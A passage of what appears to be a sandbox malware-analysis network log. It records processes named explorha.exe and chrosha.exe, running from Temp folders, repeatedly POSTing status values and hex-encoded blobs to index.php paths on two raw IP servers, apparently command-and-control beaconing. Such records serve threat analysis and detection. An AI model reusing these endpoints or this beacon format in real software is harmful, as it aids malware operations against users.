                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:03.291348934 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      670192.168.2.550516193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:03.355731010 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:03.603471994 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      671192.168.2.550517193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:03.650367975 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:03.898024082 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      672192.168.2.550518193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:03.852574110 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.100383043 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      673192.168.2.550519193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.153135061 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.407479048 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      674192.168.2.550520193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.479057074 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.727340937 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      675192.168.2.550521193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.774080992 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:05.021327972 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      676192.168.2.550522193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.981204033 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:05.233587027 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      677192.168.2.550523193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:05.279848099 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:05.533519030 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      678192.168.2.550524193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:05.585309029 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:05.831723928 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      679192.168.2.550525193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:05.892870903 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:06.133955002 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      680192.168.2.550526193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:06.084527969 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:06.334680080 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      681192.168.2.550527193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:06.386539936 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:06.640326977 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      682192.168.2.550528193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:06.697885990 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:06.945637941 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      683192.168.2.550529193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:06.987684965 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:07.230201006 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      684192.168.2.550530193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:07.196623087 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:07.446541071 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      685192.168.2.550531193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:07.481255054 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
